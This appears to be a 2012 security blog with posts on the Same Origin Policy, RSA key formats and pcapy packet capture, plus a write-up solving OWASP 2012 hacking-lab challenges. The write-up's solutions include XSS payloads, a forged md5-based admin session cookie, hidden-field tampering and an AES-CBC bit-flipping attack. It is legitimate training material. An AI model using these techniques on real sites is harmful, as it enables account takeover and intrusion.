Wednesday, May 16, 2012

Same Origin Policy for Document Object Model


The Same Origin Policy was introduced by Netscape in 1995 and has since been implemented by all modern web browsers. Its principle: pages from the same site can access each other's DOM without restriction, but pages from one site cannot access the DOM of pages from a different site. The policy provides strict content segregation between websites to preserve confidentiality and integrity.

The origin is defined by three parts:

  • Domain name  (for example, www.example.com)
  • Application protocol (for example, http or https)
  •  Port number (for example, 80 or 8080)

Two origins are the same only if all three parts match exactly. Internet Explorer historically did not include the port number in its origin comparison, so two ports on the same host were treated as one origin there.

There are two popular ways to relax the Same Origin Policy between cooperating documents:
  • Changing document.domain

Two pages whose hosts share a common parent domain (not merely a top-level domain) can each set document.domain to that parent domain and then access each other's DOM. For example, login.example.com and register.example.com can both set document.domain = "example.com". The security concern is that any other host under that parent, such as evil.example.com, can join the party by setting its own document.domain = "example.com"; browsers refuse only a bare public suffix such as "com". Modern browsers have since moved away from this mechanism (Chrome, for example, made document.domain immutable by default in 2023).
  •  Use postMessage of HTML5

HTML5 provides window.postMessage for passing data between documents of different origins, and all modern web browsers support it. It is not a bypass of the Same Origin Policy but a controlled channel: the sender names the origin allowed to receive the message (the targetOrigin argument; avoid "*" for anything sensitive), and the receiver must compare event.origin exactly against the origin it trusts before acting on event.data.

For example, a page at http://example.org sends a message to its sibling frame named "orgFrame" (a page at http://www.example.com), and the receiving page accepts messages only from http://example.org:

// Sender (page at http://example.org): deliver only to a window whose origin is http://www.example.com
var framewindow = window.parent.frames["orgFrame"];
framewindow.postMessage('this is a test message', 'http://www.example.com');

// Receiver (page at http://www.example.com)
function receiveMessage(event)
{
    if (event.origin !== "http://example.org") // accept the trusted origin only: exact comparison, never indexOf or a prefix match
        return;
    // process event.data here
}
window.addEventListener("message", receiveMessage, false); // add message handler
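To make the three-part rule, the Internet Explorer port exception and the document.domain relaxation concrete, here is an added Python example. It is not code from the original post: the browser performs these checks itself, this only models the rules. The hostnames, the three-entry public-suffix list and the "trusted origin" value are assumptions for illustration. It also shows why a message handler must compare event.origin exactly: a prefix match accepts http://example.org.evil.net.

```python
from urllib.parse import urlsplit

# Default ports per scheme: http://www.example.com and http://www.example.com:80 are one origin.
DEFAULT_PORTS = {"http": 80, "https": 443, "ws": 80, "wss": 443}

# Assumption for illustration: a tiny public-suffix list. Browsers use the full list.
PUBLIC_SUFFIXES = ("com", "org", "net")


def origin_of(url):
    """Return the (scheme, host, port) tuple that defines a URL's origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS or not parts.hostname:
        raise ValueError("cannot derive an origin from %r" % url)
    port = parts.port if parts.port is not None else DEFAULT_PORTS[scheme]
    return (scheme, parts.hostname.lower(), port)


def serialize_origin(url):
    """String form used by postMessage's targetOrigin and event.origin: default port omitted."""
    scheme, host, port = origin_of(url)
    if port == DEFAULT_PORTS[scheme]:
        return "%s://%s" % (scheme, host)
    return "%s://%s:%d" % (scheme, host, port)


def same_origin(url_a, url_b, ignore_port=False):
    """Strict three-part comparison; ignore_port=True models the Internet Explorer exception."""
    a, b = origin_of(url_a), origin_of(url_b)
    return a[:2] == b[:2] if ignore_port else a == b


def can_set_document_domain(current_host, new_value):
    """Legacy document.domain relaxation: the new value must be the host itself or a parent
    domain on a label boundary, and browsers refuse a bare public suffix such as "com"."""
    cur = current_host.lower().rstrip(".").split(".")
    new = new_value.lower().rstrip(".").split(".")
    if new_value.lower().rstrip(".") in PUBLIC_SUFFIXES:
        return False
    return len(new) <= len(cur) and cur[len(cur) - len(new):] == new


def naive_origin_check(event_origin, trusted="http://example.org"):
    """The classic handler bug: prefix/substring matching instead of an exact comparison."""
    return event_origin.startswith(trusted)  # "http://example.org.evil.net" passes


def strict_origin_check(event_origin, allowed=("http://example.org",)):
    """Exact match against an allowlist of serialized origins: what receiveMessage should do."""
    return event_origin in allowed
```

can_set_document_domain shows the weakness described above: evil.example.com is allowed to relax to example.com exactly like login.example.com is, because the rule only checks for a parent domain, not for trust.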

Tuesday, May 15, 2012

Different formats for RSA keys


RSA keys can be saved in different formats: PEM, DER, Microsoft PUBLICKEYBLOB and Microsoft PRIVATEKEYBLOB. Converting keys from one format to another can be challenging.


The keys contain the big integers used by the algorithm.
·         Private key contains: modulus, private exponent, public exponent, prime 1, prime 2, exponent 1, exponent 2 and coefficient (the PKCS#1 RSAPrivateKey fields).
·         Public key contains only modulus and public exponent.

  • DER format is a binary encoding of an Abstract Syntax Notation One (ASN.1) structure. You can use an ASN.1 editor to view its structure and contents. Note that there are two ASN.1 layouts for a public key: the bare PKCS#1 RSAPublicKey (modulus and exponent only) and SubjectPublicKeyInfo, which wraps it together with an algorithm identifier. OpenSSL's -pubin expects the latter (the "BEGIN PUBLIC KEY" form).
  • PEM format from OpenSSL is the base64 encoding of the DER bytes, wrapped in -----BEGIN ...----- and -----END ...----- lines whose label (RSA PRIVATE KEY, PUBLIC KEY, ...) tells you which ASN.1 structure is inside.
  • PRIVATEKEYBLOB and PUBLICKEYBLOB are C-style structures defined by Microsoft for CryptoAPI: a BLOBHEADER, an RSAPUBKEY header (magic "RSA1" or "RSA2", bit length, public exponent) and then the big integers in little-endian byte order, the opposite of DER.

OpenSSL is a nice tool to convert the keys from one format to another. Here are some examples (the "MS PUBLICKEYBLOB" and "MS PRIVATEKEYBLOB" format names are those accepted by the OpenSSL 1.0 series; they contain a space, so quote them, with no backslash; check openssl rsa -help on newer releases):

#convert private key from PEM to DER
openssl.exe rsa -inform PEM -in test.pem -outform DER -out test.der
#convert private key from DER to PEM
openssl.exe rsa -inform DER -in test.der -outform PEM -out test1.pem
#convert public key from PEM to DER (-pubin: the input is a SubjectPublicKeyInfo "PUBLIC KEY" block)
openssl.exe rsa -inform PEM -pubin -in testPub.pem -outform DER -out testPub.der
#convert public key from DER to PEM
openssl.exe rsa -inform DER -pubin -in testPub.der -outform PEM -out testPub.pem
#convert public key from PEM to PUBLICKEYBLOB
openssl.exe rsa -inform PEM -pubin -in testPub.pem -outform "MS PUBLICKEYBLOB" -out testPub.pblob
#convert private key from PEM to PRIVATEKEYBLOB
openssl.exe rsa -inform PEM -in test.pem -outform "MS PRIVATEKEYBLOB" -out test.pblob

Here is a Python script that strips the PEM armour and prints the DER bytes as hex (this is all a PEM-to-DER conversion does, since PEM is base64 of DER):
import base64
import binascii

fileName = "c:\\temp\\testPub.pem"
with open(fileName, 'r') as f:
    lines = f.read().splitlines()
# Drop the -----BEGIN ...----- / -----END ...----- lines and any blank lines;
# the remaining lines are the base64 of the DER structure.
body = ''.join(line.strip() for line in lines if line.strip() and not line.startswith('-----'))
data = base64.b64decode(body)
print(binascii.hexlify(data))
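The conversions above are opaque unless you have seen the bytes once. The following added Python 3 example (not code from the post or from OpenSSL) encodes and decodes the PKCS#1 RSAPublicKey and SubjectPublicKeyInfo DER structures and builds and parses a Microsoft PUBLICKEYBLOB, which is what openssl rsa -pubin ... -outform "MS PUBLICKEYBLOB" rewrites. The sample key (p=61, q=53, e=17) is constructed and far too small to use; the blob layout follows Microsoft's BLOBHEADER/RSAPUBKEY documentation. PRIVATEKEYBLOB adds the CRT components after the modulus and is not handled here.

```python
import struct

# Constructed sample key: the textbook pair p=61, q=53 with e=17 (n=3233). Far too small to
# be a real key, but it exercises every structure below exactly as a 2048-bit key does.
SAMPLE_N, SAMPLE_E = 3233, 17
RSA_ENCRYPTION_OID = bytes.fromhex("06092a864886f70d010101")  # OID 1.2.840.113549.1.1.1
DER_NULL = b"\x05\x00"


def _der_len(n):
    """DER length: one byte below 128, else 0x80|count followed by the big-endian length."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der_integer(value):
    body = value.to_bytes((value.bit_length() + 7) // 8 or 1, "big")
    if body[0] & 0x80:  # INTEGER is signed: a leading 0x00 keeps a big modulus positive
        body = b"\x00" + body
    return b"\x02" + _der_len(len(body)) + body


def _der_sequence(content):
    return b"\x30" + _der_len(len(content)) + content


def _read_tlv(buf, pos):
    """Read one tag-length-value at buf[pos]; return (tag, content, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    if pos + length > len(buf):
        raise ValueError("DER element overruns the buffer")
    return tag, buf[pos:pos + length], pos + length


def encode_rsa_public_key(n, e):
    """PKCS#1 RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    return _der_sequence(_der_integer(n) + _der_integer(e))


def decode_rsa_public_key(der):
    tag, seq, end = _read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("expected exactly one SEQUENCE")
    tag_n, n_bytes, pos = _read_tlv(seq, 0)
    tag_e, e_bytes, pos = _read_tlv(seq, pos)
    if tag_n != 0x02 or tag_e != 0x02 or pos != len(seq):
        raise ValueError("expected SEQUENCE { INTEGER, INTEGER }")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def encode_spki(n, e):
    """SubjectPublicKeyInfo, the "BEGIN PUBLIC KEY" form that 'openssl rsa -pubin' reads:
    SEQUENCE { SEQUENCE { rsaEncryption OID, NULL }, BIT STRING { RSAPublicKey } }."""
    key = encode_rsa_public_key(n, e)
    bit_string = b"\x03" + _der_len(len(key) + 1) + b"\x00" + key  # leading 0x00: no unused bits
    return _der_sequence(_der_sequence(RSA_ENCRYPTION_OID + DER_NULL) + bit_string)


def decode_spki(der):
    tag, outer, _ = _read_tlv(der, 0)
    tag_alg, alg, pos = _read_tlv(outer, 0)
    tag_bits, bits, _ = _read_tlv(outer, pos)
    if tag != 0x30 or tag_alg != 0x30 or tag_bits != 0x03 or not bits or bits[0] != 0:
        raise ValueError("not a SubjectPublicKeyInfo")
    if not alg.startswith(RSA_ENCRYPTION_OID):
        raise ValueError("algorithm is not rsaEncryption")
    return decode_rsa_public_key(bits[1:])


def to_ms_publickeyblob(n, e):
    """CryptoAPI PUBLICKEYBLOB: BLOBHEADER, RSAPUBKEY, then the modulus little-endian."""
    if e >= 1 << 32:
        raise ValueError("RSAPUBKEY stores the public exponent as a 32-bit DWORD")
    n_len = (n.bit_length() + 7) // 8
    header = struct.pack("<BBHI", 0x06, 0x02, 0, 0x0000A400)  # PUBLICKEYBLOB, version 2, reserved, CALG_RSA_KEYX
    rsapubkey = struct.pack("<III", 0x31415352, n_len * 8, e)  # magic "RSA1", bitlen, pubexp
    return header + rsapubkey + n.to_bytes(n_len, "little")


def from_ms_publickeyblob(blob):
    b_type, _version, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, e = struct.unpack_from("<III", blob, 8)
    if b_type != 0x06 or magic != 0x31415352 or bitlen % 8 or alg not in (0xA400, 0x2400):
        raise ValueError("not an RSA PUBLICKEYBLOB")  # 0x2400 is CALG_RSA_SIGN
    n = int.from_bytes(blob[20:20 + bitlen // 8], "little")
    return n, e


if __name__ == "__main__":
    print("PKCS#1 RSAPublicKey DER :", encode_rsa_public_key(SAMPLE_N, SAMPLE_E).hex())
    print("SubjectPublicKeyInfo DER:", encode_spki(SAMPLE_N, SAMPLE_E).hex())
    print("MS PUBLICKEYBLOB        :", to_ms_publickeyblob(SAMPLE_N, SAMPLE_E).hex())
```

For the toy key the RSAPublicKey is nine bytes, 30 07 02 02 0c a1 02 01 11, and the blob is 8 + 12 + 2 bytes. A real 2048-bit modulus produces the long-form DER lengths (0x82 ...) and a 276-byte blob; the parser handles both. The byte-order difference is the thing to remember when a conversion "almost" works: DER integers are big-endian, the CAPI blob stores the modulus little-endian.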

Thursday, May 10, 2012

Use pcapy and impacket to interact with libpcap in Python

I need to read and analyze some TCP packets with Python 2.7 on Windows. After some Google searching, I decided to give pcapy and impacket a shot because they are easier to use, as shown in http://snipplr.com/view/3579/.

The first step is to install them on my Windows box. I tried easy_install and it stopped due to an error of "not being able to find pcap.h". To fix the problem, I downloaded the latest WinPcap developer's pack from http://www.winpcap.org/devel.htm. After unzipping the contents into the directory that cl.exe searches for headers, everything went well. There was no problem installing impacket with easy_install.

The second step is to write a simple script to read some TCP packets from one network interface. Here is my readLivePacket.py:

from pcapy import findalldevs, open_live
from impacket import ImpactDecoder

# findalldevs() returns the interface names in libpcap order; print them first and
# pick the index of the interface you actually want to sniff on.
devices = findalldevs()
print(devices)
pc = open_live(devices[1], 2048, False, 1000)  # device, snaplen, promiscuous, read timeout (ms)
pc.setfilter('tcp')  # BPF filter: only TCP segments reach the callback

def processPacket(hdr, data):
    decoder = ImpactDecoder.EthDecoder()
    packet = decoder.decode(data)   # Ethernet frame
    ippacket = packet.child()       # IP header
    tcppacket = ippacket.child()    # TCP header: the child of the IP layer, not of the frame
    print(tcppacket)

packet_limit = -1  # -1: loop until interrupted
pc.loop(packet_limit, processPacket)

Once the script starts, it captures and prints all TCP packets, as shown here.

I also want my script to read and analyze packets from a pcap file. Here is my readPacketFile.py:

from pcapy import open_offline
from impacket import ImpactDecoder

fileName = "c:\\temp\\rsa\\test.pcap"

pc = open_offline(fileName)
pc.setfilter('tcp')  # same BPF filter as the live capture

def processPacket(hdr, data):
    decoder = ImpactDecoder.EthDecoder()
    packet = decoder.decode(data)   # Ethernet frame
    ippacket = packet.child()       # IP header
    tcppacket = ippacket.child()    # TCP header: the child of the IP layer, not of the frame
    print(tcppacket)

packet_limit = -1  # -1: read until the end of the file
pc.loop(packet_limit, processPacket)

pcapy and impacket make analyzing network traffic in Python easy.
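pcapy hides the file format, and it helps to have parsed it once by hand. The following added Python 3 example (not code from the post, pcapy or impacket) reads the libpcap file format, walks Ethernet -> IPv4 -> TCP and keeps only TCP segments, which is what setfilter('tcp') plus EthDecoder do in the scripts above. The capture it reads is constructed in code (one TCP SYN and one UDP datagram between invented addresses), so it runs offline; pcapng files, VLAN tags and IPv6 are not handled.

```python
import socket
import struct

# Minimal libpcap-file reader plus Ethernet/IPv4/TCP decoders. The capture used for the
# demo is CONSTRUCTED by sample_capture(); no real traffic is embedded.
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP, IPPROTO_UDP = 6, 17


def _checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (the IPv4 header checksum)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src, dst, proto, payload):
    """IPv4 header without options (IHL=5), DF set, checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0x4000,
                      64, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", _checksum(hdr)) + hdr[12:] + payload


def build_tcp(sport, dport, seq, flags, payload=b""):
    """TCP header without options; checksum left 0 because the decoder does not verify it."""
    return struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 8192, 0, 0) + payload


def build_ethernet(src_mac, dst_mac, ethertype, payload):
    return dst_mac + src_mac + struct.pack("!H", ethertype) + payload


def build_pcap(frames, linktype=LINKTYPE_ETHERNET):
    """libpcap file: 24-byte global header, then a 16-byte record header before each frame."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1336608000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


def iter_pcap(data):
    """Yield (timestamp, linktype, frame); handles both byte orders and rejects truncation."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a libpcap file (magic %08x); pcapng is not handled" % magic)
    _major, _minor, _tz, _sig, snaplen, linktype = struct.unpack_from(end + "HHiIII", data, 4)
    pos = 24
    while pos + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from(end + "IIII", data, pos)
        pos += 16
        if incl_len > snaplen or pos + incl_len > len(data):
            raise ValueError("truncated or corrupt record at offset %d" % (pos - 16))
        yield ts_sec + ts_usec / 1e6, linktype, data[pos:pos + incl_len]
        pos += incl_len


def decode_ethernet(frame):
    if len(frame) < 14:
        raise ValueError("short Ethernet frame")
    return {"dst": frame[:6].hex(), "src": frame[6:12].hex(),
            "ethertype": struct.unpack("!H", frame[12:14])[0], "payload": frame[14:]}


def decode_ipv4(pkt):
    """Honour IHL and total length (Ethernet padding is not payload) and verify the checksum."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        raise ValueError("not IPv4")
    ihl, total_len = (pkt[0] & 0x0F) * 4, struct.unpack("!H", pkt[2:4])[0]
    if ihl < 20 or total_len < ihl or total_len > len(pkt):
        raise ValueError("bad IPv4 lengths")
    if _checksum(pkt[:ihl]) != 0:
        raise ValueError("bad IPv4 header checksum")
    return {"src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
            "proto": pkt[9], "payload": pkt[ihl:total_len]}


def decode_tcp(seg):
    if len(seg) < 20:
        raise ValueError("short TCP header")
    sport, dport, seq, ack, off, flags = struct.unpack("!HHIIBB", seg[:14])
    doff = (off >> 4) * 4
    if doff < 20 or doff > len(seg):
        raise ValueError("bad TCP data offset")
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags, "payload": seg[doff:]}


def tcp_packets(pcap_bytes):
    """The equivalent of setfilter('tcp'): decode Ethernet -> IPv4 -> TCP, keep only TCP."""
    result = []
    for ts, linktype, frame in iter_pcap(pcap_bytes):
        if linktype != LINKTYPE_ETHERNET:
            continue
        eth = decode_ethernet(frame)
        if eth["ethertype"] != ETHERTYPE_IPV4:
            continue
        ip = decode_ipv4(eth["payload"])
        if ip["proto"] != IPPROTO_TCP:
            continue
        tcp = decode_tcp(ip["payload"])
        result.append({"ts": ts, "src": ip["src"], "dst": ip["dst"], "sport": tcp["sport"],
                       "dport": tcp["dport"], "flags": tcp["flags"], "payload": tcp["payload"]})
    return result


def sample_capture():
    """CONSTRUCTED two-frame capture: a TCP SYN to port 443 and a UDP datagram to port 5353."""
    mac_a, mac_b = bytes.fromhex("0a0000000001"), bytes.fromhex("0a0000000002")
    syn = build_tcp(40000, 443, 1000, 0x02)
    udp = struct.pack("!HHHH", 5353, 5353, 8, 0)
    return build_pcap([
        build_ethernet(mac_a, mac_b, ETHERTYPE_IPV4, build_ipv4("10.0.0.1", "10.0.0.2", IPPROTO_TCP, syn)),
        build_ethernet(mac_a, mac_b, ETHERTYPE_IPV4, build_ipv4("10.0.0.1", "10.0.0.2", IPPROTO_UDP, udp)),
    ])


if __name__ == "__main__":
    for pkt in tcp_packets(sample_capture()):
        print(pkt)
```

The length checks in iter_pcap and decode_ipv4 matter more than they look: a capture with a corrupt record header is a common way to crash a naive analysis script, and trusting the frame length instead of the IP total length silently treats Ethernet padding as TCP payload.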

Tuesday, May 8, 2012

OWASP 2012 Online Competition

OWASP 2012 Online Competition starts from 05/01/2012. The details can be found at https://www.hacking-lab.com/user/cases/cases.html?event=284

I spent 8 hours on 05/02/2012 and solved all challenges. Here are my solutions to the challenges:

  1. 8018 OWASP Hackademic Challenge 1. There is an unusual element in the source code of the page: YXBwc2VjX3VzYTp0aGlzZWFz. This is the base64 encoding of appsec_usa:thiseas, the user name and password for the portal.
  2. 8019 OWASP Hackademic Challenge 2. The goal is to find the password to the website. However, the website hides its password within the JavaScript shown below. I just used Firebug and found the password: "take a break"

     function GetPassInfo(){
     var madhouuuuuuuseeee = "givesacountinatobp laryk"

     var j = madhouuuuuuuseeee.charAt(1); var h = madhouuuuuuuseeee.charAt(0); var l = madhouuuuuuuseeee.charAt(17);
     var g = madhouuuuuuuseeee.charAt(2); var i = madhouuuuuuuseeee.charAt(6); var x = madhouuuuuuuseeee.charAt(18);
     var l = madhouuuuuuuseeee.charAt(3); var p = madhouuuuuuuseeee.charAt(2); var m = madhouuuuuuuseeee.charAt(20);
     var s = madhouuuuuuuseeee.charAt(17); var k = madhouuuuuuuseeee.charAt(10); var d = madhouuuuuuuseeee.charAt(3);
     var bb = madhouuuuuuuseeee.charAt(6); var d = madhouuuuuuuseeee.charAt(13); var r = madhouuuuuuuseeee.charAt(8);
     var a = madhouuuuuuuseeee.charAt(0); var d = madhouuuuuuuseeee.charAt(3); var r = madhouuuuuuuseeee.charAt(16);
     var b = madhouuuuuuuseeee.charAt(1); var e = madhouuuuuuuseeee.charAt(4); var j = madhouuuuuuuseeee.charAt(9);
     var c = madhouuuuuuuseeee.charAt(2); var f = madhouuuuuuuseeee.charAt(5); var g = madhouuuuuuuseeee.charAt(4);
     var j = madhouuuuuuuseeee.charAt(9); var h = madhouuuuuuuseeee.charAt(6); var l = madhouuuuuuuseeee.charAt(11);
     var g = madhouuuuuuuseeee.charAt(4); var i = madhouuuuuuuseeee.charAt(7); var x = madhouuuuuuuseeee.charAt(21);
     var l = madhouuuuuuuseeee.charAt(11); var p = madhouuuuuuuseeee.charAt(4); var m = madhouuuuuuuseeee.charAt(4);
     var s = madhouuuuuuuseeee.charAt(17); var k = madhouuuuuuuseeee.charAt(10); var d = madhouuuuuuuseeee.charAt(3);
     var t = madhouuuuuuuseeee.charAt(18); var n = madhouuuuuuuseeee.charAt(12); var e = madhouuuuuuuseeee.charAt(4);
     var a = madhouuuuuuuseeee.charAt(0); var o = madhouuuuuuuseeee.charAt(13); var f = madhouuuuuuuseeee.charAt(5);
     var b = madhouuuuuuuseeee.charAt(1); var q = madhouuuuuuuseeee.charAt(15); var h = madhouuuuuuuseeee.charAt(6);
     var c = madhouuuuuuuseeee.charAt(2); var h = madhouuuuuuuseeee.charAt(6); var i = madhouuuuuuuseeee.charAt(7);
     var j = madhouuuuuuuseeee.charAt(9); var i = madhouuuuuuuseeee.charAt(7); var y = madhouuuuuuuseeee.charAt(22);
     var g = madhouuuuuuuseeee.charAt(4); var p = madhouuuuuuuseeee.charAt(4); var yy = madhouuuuuuuseeee.charAt(23);
     var l = madhouuuuuuuseeee.charAt(11); var k = madhouuuuuuuseeee.charAt(10); var bb = madhouuuuuuuseeee.charAt(14);
     var q = madhouuuuuuuseeee.charAt(20); var n = madhouuuuuuuseeee.charAt(12);
     var m = madhouuuuuuuseeee.charAt(4); var o = madhouuuuuuuseeee.charAt(13);
     var p = madhouuuuuuuseeee.charAt(4)
     var Wrong = (bb+""+q+""+yy+""+d+""+t+""+f+""+t+""+r+""+x+""+d+""+f+""+yy)

     if (document.forms[0].Password1.value == Wrong)
     location.href="index.php?Result=" + Wrong;
     }

     Only the last assignment to each variable matters (bb, q, yy, d, t, f, r, x), and those indices into the string spell the password.
  3. 8020 OWASP Hackademic Challenge 3. The goal is to test an XSS issue and generate an alert box with the message "XSS!". Unfortunately, it seems that the challenge is only a string-matching XSS problem. The matching string is <script> alert('XSS!'); </script>
  4. 8021 OWASP Hackademic Challenge 4. This challenge is just a variation of challenge 3 with the same goal. The matching string is: <script> alert(String.fromCharCode(88,83,83,33)); </script>
  5. 8022 OWASP Hackademic Challenge 5. The goal is to access the hidden content with their special web browser. The answer is to change the user agent of the web browser: User-Agent: p0wnBrowser version 2.30
  6. 8023 OWASP Hackademic Challenge 6. The goal is to find the password to access the website. The password is hidden in JavaScript again. The JavaScript can be obtained by using Firebug and JavaScript Shell. The password is: h@ckers!
  7. 8024 OWASP Hackademic Challenge 7. The goal is to gain admin access to the website. After spidering the website, I found an interesting file http://hackademics.hacking-lab.com/ch007/index_files/lastlogin.log. Here is its content:
     30 31 30 30 31 31 30 30 20 30 31 31 30 30 30 30 31 20 30 31 31 31 30 30 31 31 20 30 31 31 31 30 31 30 30 20 30 30 31 30 30 30 30 30 20 30 31 30 30 31 31 30 30 20 30 31 31 30 31 31 31 31 20 30 31 31 30 30 31 31 31 20 30 31 31 30 31 30 30 31 20 30 31 31 30 31 31 31 30 20 30 30 31 30 30 30 30 30 20 30 31 31 30 30 30 31 30 20 30 31 31 31 31 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 30 30 30 30 30 20 30 31 30 30 30 30 30 31 20 30 31 31 30 31 31 30 30 20 30 31 31 30 31 30 30 31 20 30 31 31 30 30 30 31 31 20 30 31 31 30 30 31 30 31 20 30 30 31 30 30 30 30 30 20 30 31 30 31 30 30 30 30 20 30 31 31 31 30 30 31 30 20 30 31 31 30 30 31 30 31 20 30 31 31 31 30 31 30 30 20 30 31 31 31 30 31 30 30 20 30 31 31 31 31 30 30 31 20 30 30 31 30 31 31 30 30 20 30 30 31 30 30 30 30 30 20 30 31 31 31 30 31 30 31 20 30 31 31 31 30 30 31 31 20 30 31 31 30 30 31 30 31 20 30 31 31 31 30 30 31 30 20 30 31 31 30 31 31 31 30 20 30 31 31 30 30 30 30 31 20 30 31 31 30 31 31 30 31 20 30 31 31 30 30 31 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 30 30 30 30 30 20 30 31 30 30 30 30 30 31 20 30 31 31 30 31 31 30 30 20 30 31 31 30 31 30 30 31 20 30 31 31 30 30 30 31 31 20 30 31 31 30 30 31 30 31 20 30 30 31 30 30 30 30 30 20 30 31 31 30 30 30 30 31 20 30 31 31 31 30 31 30 30 20 30 30 31 30 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 31 30 30 20 30 30 31 30 31 31 31 31 20 30 30 31 31 30 30 31 31 20 30 30 31 30 31 31 31 31 20 30 30 31 31 30 30 31 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 30 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 31 30 31 20 30 30 31 31 31 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 31 31 30 30 30 30 31 20 30 31 31 30 31 31 30 
     It looks like ASCII codes in binary form once 30 is read as 0, 31 as 1 and 20 as a separator. A simple Python script decodes its content as:
     Last Login by: Alice Pretty, username: Alice at 14/3/2011 10:59:00am
     Now we have a user name "Alice" which can be used to access the website. I noticed that the session id remained the same for different sessions of Alice. The session id is 64489c85dc2fe0787b85cd87214b3810.0. The first part looks like an MD5 hash: 64489c85dc2fe0787b85cd87214b3810 = md5(Alice). OK, I just need to generate a new session token for admin. After several attempts, the system accepted this cookie: e3afed0047b08059d0fada10f400c1e5.1
     where md5(Admin) = e3afed0047b08059d0fada10f400c1e5
  8. 8025 OWASP Hackademic Challenge 8. The goal is to access the website as admin. The backdoor shell only supports these commands: ls, whoami, id, help, su. If su is typed, the shell asks for a user name and password. I also noticed an interesting image file found by using the "ls" command: http://hackademics.hacking-lab.com/ch008/4admin0Nly.jpg. It is not a normal JPG image file. Its content is:
     2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 55 73 65 72 6e 61 6d 65 3a 20 73 75 70 65 72 61 64 6d 69 6e 20 50 61 73 73 77 6f 72 64 3a 20 30 77 40 73 70 55 53 41 79 30 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d

     Read as ASCII, its content is: Username: superadmin Password: 0w@spUSAy0
  9. 8026 OWASP Hackademic Challenge 9. The goal is to gain admin access to the website.
     1) Change the user agent of the browser to use
     2) The shell is accessible from http://hackademics.hacking-lab.com/ch009/y0_man_y0.php
     3) Use the "ls" command and find some interesting pages: adminpanel.php, y0_man_y0.php, log.history.php
     4) In the source code of http://hackademics.hacking-lab.com/ch009/log.history.php, there is an interesting comment:
     slrig_$$ap_$GN0RTS_4_s1_s1Ht :drowssap nimda :emanresu

     Decoding the comment (reversing its character order) gives the following message:
     'username: admin password: tH1s_1s_4_STR0NG$_pa$$_girls'
     5) Use the above user name and password to log in to the admin panel page.
  10. 8027 OWASP Hackademic Challenge 10. The goal is to gain access to the website.
     1) There is a hidden field called LetMeIn=False. I changed it to LetMeIn=True and accessed the website.
     2) The alert function looks like
     alert("01010011 01100101 01110010 01101001 01100001 01101100 00100000 01001110 01110101 01101101 01100010 01100101 01110010 00111010 00100000 01010100 01001000 01001001 01010011 00101101 01001001 01010011 01001111 01000100 01000100 00101101 01000011 01000001 01010101 01010011 01000101 00101101 01001001 01000001 01001101 01000001 00101101 01010011 01010101 01010000 01000001 00101101 01001000 01000001 01000011 01001011 01000001 ")
     A simple Python script decodes this as Serial Number: THIS-ISODD-CAUSE-IAMA-SUPA-HACKA
     3) Enter this code and the mission is accomplished.
  11. 7019 AES Bit-Flipping Attack. The goal is to regenerate a valid ticket based on an expired AES-CBC encrypted ticket: B60086CD1E68CEF25BC1BEC429D8F3C01D45F0196331DA5012B99067A25463A493CCBF690FD88F850BD5273C5A7D72B6
     1) Burp is a perfect tool to automate this attack. Burp Intruder has a bit flipper built in.
     2) Burp generated lots of valid tickets. One example is:
     60086CD1E68CEF25BC1BEC429D8F3C01D45F0196331DA5012B99063A25463A493CCBF690FD88F850BD5273C5A7D72B6

     And here is the result from the server:
     Hello hacker10 (email: You've logged-in successfully
     Ticket valid until: 20141011
     Solution code: X678RWER_HAXXOR

  12. 2312 Blind SQL Injection. The goal is to write a small program to read the email address of the customer "Franziska Knobel" through blind SQL injection.
